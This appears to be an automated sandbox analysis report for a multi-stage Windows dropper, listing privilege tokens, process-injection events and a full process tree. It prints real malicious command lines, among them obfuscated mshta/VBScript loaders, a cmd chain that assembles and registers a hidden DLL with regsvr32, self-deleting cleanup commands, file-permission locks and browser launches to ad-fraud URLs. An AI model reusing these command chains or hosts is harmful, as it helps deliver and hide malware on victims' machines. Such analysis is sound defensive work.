Token: SeAssignPrimaryTokenPrivilege	1744	7F87.exe
Token: SeLockMemoryPrivilege	1744	7F87.exe
Token: SeIncreaseQuotaPrivilege	1744	7F87.exe
Token: SeMachineAccountPrivilege	1744	7F87.exe
Token: SeTcbPrivilege	1744	7F87.exe
Token: SeSecurityPrivilege	1744	7F87.exe
Token: SeTakeOwnershipPrivilege	1744	7F87.exe
Token: SeLoadDriverPrivilege	1744	7F87.exe
Token: SeSystemProfilePrivilege	1744	7F87.exe
Token: SeSystemtimePrivilege	1744	7F87.exe
Token: SeProfSingleProcessPrivilege	1744	7F87.exe
Token: SeIncBasePriorityPrivilege	1744	7F87.exe
Token: SeCreatePagefilePrivilege	1744	7F87.exe
Token: SeCreatePermanentPrivilege	1744	7F87.exe
Token: SeBackupPrivilege	1744	7F87.exe
Token: SeRestorePrivilege	1744	7F87.exe
Token: SeShutdownPrivilege	1744	7F87.exe
Token: SeDebugPrivilege	1744	7F87.exe
Token: SeAuditPrivilege	1744	7F87.exe
Token: SeSystemEnvironmentPrivilege	1744	7F87.exe
Token: SeChangeNotifyPrivilege	1744	7F87.exe
Token: SeRemoteShutdownPrivilege	1744	7F87.exe
Token: SeUndockPrivilege	1744	7F87.exe
Token: SeSyncAgentPrivilege	1744	7F87.exe
Token: SeEnableDelegationPrivilege	1744	7F87.exe
Token: SeManageVolumePrivilege	1744	7F87.exe
Token: SeImpersonatePrivilege	1744	7F87.exe
Token: SeCreateGlobalPrivilege	1744	7F87.exe
Token: 31	1744	7F87.exe
Token: 32	1744	7F87.exe
Token: 33	1744	7F87.exe
Token: 34	1744	7F87.exe
Token: 35	1744	7F87.exe
Token: SeDebugPrivilege	1384	487C.exe
Token: SeImpersonatePrivilege	1384	487C.exe
Token: SeDebugPrivilege	2104	taskkill.exe
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeDebugPrivilege	1916	9144.exe
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeDebugPrivilege	2904	taskkill.exe
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeDebugPrivilege	2292	Takushulaga.exe
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found
Token: SeShutdownPrivilege	1240	Process not Found

Suspicious use of FindShellTrayWindow 13 IoCs

pid	Process
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
2216	irecord.tmp
2556	iexplore.exe
2556	iexplore.exe
2556	iexplore.exe
2556	iexplore.exe
2556	iexplore.exe
2556	iexplore.exe

Suspicious use of SendNotifyMessage 10 IoCs

pid	Process
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found
1240	Process not Found

Suspicious use of SetWindowsHookEx 38 IoCs

pid	Process
760	C033.exe
432	C7E2.exe
2556	iexplore.exe
2556	iexplore.exe
2556	iexplore.exe
2556	iexplore.exe
1552	IEXPLORE.EXE
1552	IEXPLORE.EXE
1552	IEXPLORE.EXE
1552	IEXPLORE.EXE
2556	iexplore.exe
2556	iexplore.exe
2068	IEXPLORE.EXE
2068	IEXPLORE.EXE
2068	IEXPLORE.EXE
2068	IEXPLORE.EXE
2556	iexplore.exe
2556	iexplore.exe
1492	IEXPLORE.EXE
1492	IEXPLORE.EXE
1492	IEXPLORE.EXE
1492	IEXPLORE.EXE
2556	iexplore.exe
2556	iexplore.exe
2472	IEXPLORE.EXE
2472	IEXPLORE.EXE
2556	iexplore.exe
2556	iexplore.exe
1936	IEXPLORE.EXE
1936	IEXPLORE.EXE
1936	IEXPLORE.EXE
1936	IEXPLORE.EXE
2556	iexplore.exe
2556	iexplore.exe
1552	IEXPLORE.EXE
1552	IEXPLORE.EXE
1552	IEXPLORE.EXE
1552	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1108 wrote to memory of 1368	1108	toolspab2 (23).exe	29
PID 1108 wrote to memory of 1368	1108	toolspab2 (23).exe	29
PID 1108 wrote to memory of 1368	1108	toolspab2 (23).exe	29
PID 1108 wrote to memory of 1368	1108	toolspab2 (23).exe	29
PID 1108 wrote to memory of 1368	1108	toolspab2 (23).exe	29
PID 1108 wrote to memory of 1368	1108	toolspab2 (23).exe	29
PID 1108 wrote to memory of 1368	1108	toolspab2 (23).exe	29
PID 1240 wrote to memory of 760	1240	Process not Found	30
PID 1240 wrote to memory of 760	1240	Process not Found	30
PID 1240 wrote to memory of 760	1240	Process not Found	30
PID 1240 wrote to memory of 760	1240	Process not Found	30
PID 1240 wrote to memory of 432	1240	Process not Found	31
PID 1240 wrote to memory of 432	1240	Process not Found	31
PID 1240 wrote to memory of 432	1240	Process not Found	31
PID 1240 wrote to memory of 432	1240	Process not Found	31
PID 1240 wrote to memory of 1120	1240	Process not Found	32
PID 1240 wrote to memory of 1120	1240	Process not Found	32
PID 1240 wrote to memory of 1120	1240	Process not Found	32
PID 1240 wrote to memory of 1120	1240	Process not Found	32
PID 1120 wrote to memory of 984	1120	733F.exe	34
PID 1120 wrote to memory of 984	1120	733F.exe	34
PID 1120 wrote to memory of 984	1120	733F.exe	34
PID 1120 wrote to memory of 984	1120	733F.exe	34
PID 1120 wrote to memory of 984	1120	733F.exe	34
PID 1120 wrote to memory of 984	1120	733F.exe	34
PID 1120 wrote to memory of 984	1120	733F.exe	34
PID 1120 wrote to memory of 984	1120	733F.exe	34
PID 1120 wrote to memory of 984	1120	733F.exe	34
PID 1240 wrote to memory of 540	1240	Process not Found	35
PID 1240 wrote to memory of 540	1240	Process not Found	35
PID 1240 wrote to memory of 540	1240	Process not Found	35
PID 1240 wrote to memory of 540	1240	Process not Found	35
PID 1240 wrote to memory of 1480	1240	Process not Found	36
PID 1240 wrote to memory of 1480	1240	Process not Found	36
PID 1240 wrote to memory of 1480	1240	Process not Found	36
PID 1240 wrote to memory of 1480	1240	Process not Found	36
PID 1240 wrote to memory of 1332	1240	Process not Found	37
PID 1240 wrote to memory of 1332	1240	Process not Found	37
PID 1240 wrote to memory of 1332	1240	Process not Found	37
PID 1240 wrote to memory of 1332	1240	Process not Found	37
PID 1240 wrote to memory of 1736	1240	Process not Found	38
PID 1240 wrote to memory of 1736	1240	Process not Found	38
PID 1240 wrote to memory of 1736	1240	Process not Found	38
PID 1240 wrote to memory of 1736	1240	Process not Found	38
PID 1240 wrote to memory of 1920	1240	Process not Found	39
PID 1240 wrote to memory of 1920	1240	Process not Found	39
PID 1240 wrote to memory of 1920	1240	Process not Found	39
PID 1240 wrote to memory of 1920	1240	Process not Found	39
PID 1240 wrote to memory of 1920	1240	Process not Found	39
PID 1240 wrote to memory of 936	1240	Process not Found	41
PID 1240 wrote to memory of 936	1240	Process not Found	41
PID 1240 wrote to memory of 936	1240	Process not Found	41
PID 1240 wrote to memory of 936	1240	Process not Found	41
PID 1240 wrote to memory of 1376	1240	Process not Found	42
PID 1240 wrote to memory of 1376	1240	Process not Found	42
PID 1240 wrote to memory of 1376	1240	Process not Found	42
PID 1240 wrote to memory of 1376	1240	Process not Found	42
PID 1240 wrote to memory of 1376	1240	Process not Found	42
PID 1240 wrote to memory of 2032	1240	Process not Found	43
PID 1240 wrote to memory of 2032	1240	Process not Found	43
PID 1240 wrote to memory of 2032	1240	Process not Found	43
PID 1240 wrote to memory of 2032	1240	Process not Found	43
PID 1240 wrote to memory of 1952	1240	Process not Found	44
PID 1240 wrote to memory of 1952	1240	Process not Found	44

C:\Users\Admin\AppData\Local\Temp\toolspab2 (23).exe
"C:\Users\Admin\AppData\Local\Temp\toolspab2 (23).exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1108
- C:\Users\Admin\AppData\Local\Temp\toolspab2 (23).exe
  "C:\Users\Admin\AppData\Local\Temp\toolspab2 (23).exe"
  2⤵
  - Loads dropped DLL
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:1368

C:\Users\Admin\AppData\Local\Temp\C033.exe
C:\Users\Admin\AppData\Local\Temp\C033.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:760

C:\Users\Admin\AppData\Local\Temp\C7E2.exe
C:\Users\Admin\AppData\Local\Temp\C7E2.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:432

C:\Users\Admin\AppData\Local\Temp\733F.exe
C:\Users\Admin\AppData\Local\Temp\733F.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1120
- C:\Users\Admin\AppData\Local\Temp\733F.exe
  C:\Users\Admin\AppData\Local\Temp\733F.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:984

C:\Users\Admin\AppData\Local\Temp\8E3E.exe
C:\Users\Admin\AppData\Local\Temp\8E3E.exe
1⤵
- Executes dropped EXE
PID:540

C:\Users\Admin\AppData\Local\Temp\9216.exe
C:\Users\Admin\AppData\Local\Temp\9216.exe
1⤵
- Executes dropped EXE
PID:1480

C:\Users\Admin\AppData\Local\Temp\A01B.exe
C:\Users\Admin\AppData\Local\Temp\A01B.exe
1⤵
- Executes dropped EXE
PID:1332

C:\Users\Admin\AppData\Local\Temp\A8F2.exe
C:\Users\Admin\AppData\Local\Temp\A8F2.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1736

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1920

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:936

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1376

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:2032

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1952

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1084

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1660

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:316

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1588

C:\Users\Admin\AppData\Local\Temp\487C.exe
C:\Users\Admin\AppData\Local\Temp\487C.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:340
- C:\Users\Admin\AppData\Local\Temp\487C.exe
  C:\Users\Admin\AppData\Local\Temp\487C.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Modifies system certificate store
  PID:240
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:1636
- - C:\Users\Admin\AppData\Local\Temp\487C.exe
    "C:\Users\Admin\AppData\Local\Temp\487C.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    PID:1620
  - - C:\Users\Admin\AppData\Local\Temp\487C.exe
      "C:\Users\Admin\AppData\Local\Temp\487C.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      Modifies extensions of user files
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:1384
    - - C:\Users\Admin\AppData\Local\774de31e-8c50-4d0a-83b3-27251a1144fe\build2.exe
        
        "C:\Users\Admin\AppData\Local\774de31e-8c50-4d0a-83b3-27251a1144fe\build2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2172
      - C:\Users\Admin\AppData\Local\774de31e-8c50-4d0a-83b3-27251a1144fe\build2.exe
        
        "C:\Users\Admin\AppData\Local\774de31e-8c50-4d0a-83b3-27251a1144fe\build2.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:2428
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\774de31e-8c50-4d0a-83b3-27251a1144fe\build2.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:2876
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im build2.exe /f
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2904
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:2948

C:\Users\Admin\AppData\Local\Temp\4A03.exe
C:\Users\Admin\AppData\Local\Temp\4A03.exe
1⤵
- Executes dropped EXE
PID:932
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" vBSCRIPt:CloSE ( cREaTEoBJecT ( "wscriPt.shEll" ).Run ( "CMD.Exe /q /C copY /y ""C:\Users\Admin\AppData\Local\Temp\4A03.exe"" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF """" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\4A03.exe"" ) do taskkill -iM ""%~NxE"" -f " , 0,TRuE ))
  2⤵
  PID:604
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /q /C copY /y "C:\Users\Admin\AppData\Local\Temp\4A03.exe" ..\U1PwSASbnJZ1Nt2.eXE&&StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF ""== "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\4A03.exe" ) do taskkill -iM "%~NxE" -f
    3⤵
    - Loads dropped DLL
    PID:1836
  - - C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE
      ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS
      4⤵
      Executes dropped EXE
      PID:1360
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCRIPt:CloSE ( cREaTEoBJecT ( "wscriPt.shEll" ).Run ( "CMD.Exe /q /C copY /y ""C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE"" ..\U1PwSASbnJZ1Nt2.eXE && StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF ""/P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS "" == """" for %E in ( ""C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE"" ) do taskkill -iM ""%~NxE"" -f " , 0,TRuE ))
        5⤵
        
        PID:1964
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /C copY /y "C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE" ..\U1PwSASbnJZ1Nt2.eXE&&StART ..\U1PwSASbnJZ1Nt2.EXe /P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS & IF "/P3CGKJWhQOddZbA4xHxxKHWFcKxxTqS "== "" for %E in ( "C:\Users\Admin\AppData\Local\Temp\U1PwSASbnJZ1Nt2.eXE" ) do taskkill -iM "%~NxE" -f
        6⤵
        
        PID:692
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBscRipt:clOSe (CreATeobJECT ("WScRIpT.SHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C echo G9wY7C:\Users\Admin\AppData\Local\TempEfSQ> XVLAANMN.HX&echo | Set /p = ""MZ"" > P6JDQwUY.2 & COPY /B /y P6JDQwUY.2 + JRtfD7.X +DYta.ASk + I6sjWDN.8+ M0GT.7_ +XVLAANmN.HX ..\FRKN5p.zE & sTArt regsvr32 /u ..\FRKN5P.zE /S&dEl /q * " , 0,TruE ) )
        5⤵
        
        PID:2020
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /C echo G9wY7C:\Users\Admin\AppData\Local\TempEfSQ> XVLAANMN.HX&echo | Set /p = "MZ" > P6JDQwUY.2& COPY /B /y P6JDQwUY.2 + JRtfD7.X +DYta.ASk + I6sjWDN.8+M0GT.7_+XVLAANmN.HX ..\FRKN5p.zE& sTArt regsvr32 /u ..\FRKN5P.zE /S&dEl /q *
        6⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo "
        7⤵
        
        PID:1492
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>P6JDQwUY.2"
        7⤵
        
        PID:632
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /u ..\FRKN5P.zE /S
        7⤵
        Loads dropped DLL
        Suspicious use of NtCreateThreadExHideFromDebugger
        
        PID:1832
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill -iM "4A03.exe" -f
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1364

C:\Users\Admin\AppData\Local\Temp\4EE4.exe
C:\Users\Admin\AppData\Local\Temp\4EE4.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:928
- C:\Users\Admin\AppData\Local\Temp\is-KI2UN.tmp\4EE4.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-KI2UN.tmp\4EE4.tmp" /SL5="$101CC,188175,104448,C:\Users\Admin\AppData\Local\Temp\4EE4.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1940
- - C:\Users\Admin\AppData\Local\Temp\is-BC7KG.tmp\134 Vaporeondè_éçè_)))_.exe
    "C:\Users\Admin\AppData\Local\Temp\is-BC7KG.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec7
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Program Files directory
    PID:1100
  - - C:\Program Files\DVD Maker\MTDXTLSWGV\irecord.exe
      "C:\Program Files\DVD Maker\MTDXTLSWGV\irecord.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2232
    - - C:\Users\Admin\AppData\Local\Temp\is-D28T4.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-D28T4.tmp\irecord.tmp" /SL5="$4016C,5808768,66560,C:\Program Files\DVD Maker\MTDXTLSWGV\irecord.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:2216
      - C:\Program Files (x86)\i-record\I-Record.exe
        
        "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2192
  - - C:\Users\Admin\AppData\Local\Temp\4c-f4943-bc8-73b9a-9633bc7fd27cd\Gumafaezhucae.exe
      "C:\Users\Admin\AppData\Local\Temp\4c-f4943-bc8-73b9a-9633bc7fd27cd\Gumafaezhucae.exe"
      4⤵
      Executes dropped EXE
      PID:2260
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        5⤵
        Modifies Internet Explorer settings
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:2556
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2556 CREDAT:275457 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        
        PID:2744
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2556 CREDAT:603139 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1552
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2556 CREDAT:1389574 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2068
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2556 CREDAT:1389583 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1492
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2556 CREDAT:1651731 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2472
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2556 CREDAT:1520671 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1936
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
        5⤵
        
        PID:2396
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
        5⤵
        
        PID:2320
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
        5⤵
        
        PID:2256
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=2087215
        5⤵
        
        PID:2932
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=4263119
        5⤵
        
        PID:2452
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=1294231
        5⤵
        
        PID:884
  - - C:\Users\Admin\AppData\Local\Temp\30-cce63-a70-8aa91-59601fe1908fa\Takushulaga.exe
      "C:\Users\Admin\AppData\Local\Temp\30-cce63-a70-8aa91-59601fe1908fa\Takushulaga.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2292
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b4wyujz3.s03\GcleanerEU.exe /eufive & exit
        5⤵
        
        PID:2096
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ale2gai.3is\installer.exe /qn CAMPAIGN="654" & exit
        5⤵
        
        PID:972
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\siybalvs.dfb\google-game.exe & exit
        5⤵
        
        PID:2268
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h0bpuadn.cya\GcleanerWW.exe /mixone & exit
        5⤵
        
        PID:2664
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tlfnflfb.kx1\toolspab1.exe & exit
        5⤵
        
        PID:2920
      - C:\Users\Admin\AppData\Local\Temp\tlfnflfb.kx1\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\tlfnflfb.kx1\toolspab1.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1476
        
        C:\Users\Admin\AppData\Local\Temp\tlfnflfb.kx1\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\tlfnflfb.kx1\toolspab1.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:984

C:\Users\Admin\AppData\Local\Temp\5D47.exe
C:\Users\Admin\AppData\Local\Temp\5D47.exe
1⤵
PID:1384
- C:\Users\Admin\AppData\Local\Temp\5D47.exe
  "C:\Users\Admin\AppData\Local\Temp\5D47.exe"
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Modifies system certificate store
  PID:1112

C:\Users\Admin\AppData\Local\Temp\7F87.exe
C:\Users\Admin\AppData\Local\Temp\7F87.exe
1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1744
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /f /im chrome.exe
  2⤵
  PID:2072
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2104

C:\Users\Admin\AppData\Local\Temp\9144.exe
C:\Users\Admin\AppData\Local\Temp\9144.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1916

C:\Windows\system32\taskeng.exe
taskeng.exe {FAC99C61-E3E1-4C78-96DB-B4247B245CB0} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
PID:2540
- C:\Users\Admin\AppData\Roaming\duebvca
  C:\Users\Admin\AppData\Roaming\duebvca
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2636
- C:\Users\Admin\AppData\Roaming\irebvca
  C:\Users\Admin\AppData\Roaming\irebvca
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2656
- - C:\Users\Admin\AppData\Roaming\irebvca
    C:\Users\Admin\AppData\Roaming\irebvca
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:760
- C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe
  C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe --Task
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2644
- - C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe
    C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe --Task
    3⤵
    - Executes dropped EXE
    PID:2224
- C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe
  C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe --Task
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2776
- - C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe
    C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe --Task
    3⤵
    - Executes dropped EXE
    PID:2936
- C:\Users\Admin\AppData\Roaming\irebvca
  C:\Users\Admin\AppData\Roaming\irebvca
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2276
- - C:\Users\Admin\AppData\Roaming\irebvca
    C:\Users\Admin\AppData\Roaming\irebvca
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:2336
- C:\Users\Admin\AppData\Roaming\duebvca
  C:\Users\Admin\AppData\Roaming\duebvca
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:1996
- C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe
  C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe --Task
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2508
- - C:\Users\Admin\AppData\Local\669482dc-ed7b-46a8-a0ff-4122fbdb0502\487C.exe
